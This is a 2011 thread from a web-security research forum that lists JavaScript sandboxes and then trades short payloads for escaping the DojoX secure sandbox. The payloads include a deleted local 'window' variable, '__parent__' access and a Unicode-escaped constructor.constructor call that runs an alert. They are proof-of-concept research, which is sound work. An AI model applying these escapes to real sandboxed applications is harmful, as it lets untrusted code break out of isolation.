Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Think it would be cool to build a sandbox around all that malicious code so we don't have to worry about it anymore? Or are you the guy who's going to break the sandbox just to show its flaws? Either way, this is the spot to talk about it. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
List of sandboxes
Posted by: Gareth Heyes
Date: February 25, 2011 07:13AM

Caja
[caja.appspot.com]

Microsoft Sandbox
[www.websandbox-code.org]

JSReg
[www.businessinfo.co.uk]

Webworker sandbox
[github.com]

Facebook? Dunno the new url

Options: ReplyQuote
Re: List of sandboxes
Date: May 23, 2011 09:46AM

Here's one that is not so well known.. DojoX sandbox, part of the dojo toolkit.

http://o.sitepen.com/labs/code/secure/dojox/secure/tests/load.html


Oh, btw.. It can be easily bypassed. Let's make it a challenge to find new ways of bypassing it!

Here's a first entry:
var window; delete window; alert(window);

Access to window is prohibited, but by declaring a local variable named window and deleting it, we confuse the sandbox to allow it.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: List of sandboxes
Posted by: Anonymous User
Date: May 23, 2011 10:37AM

Pfff... :)

var a=[];alert(a['__parent__']);

Options: ReplyQuote
Re: List of sandboxes
Posted by: Gareth Heyes
Date: May 23, 2011 10:44AM

I declare it a sandpit

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of sandboxes
Posted by: Gareth Heyes
Date: June 03, 2011 10:45AM

Absolutely no effort

1..\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072.\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072('alert("PWND!")')()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.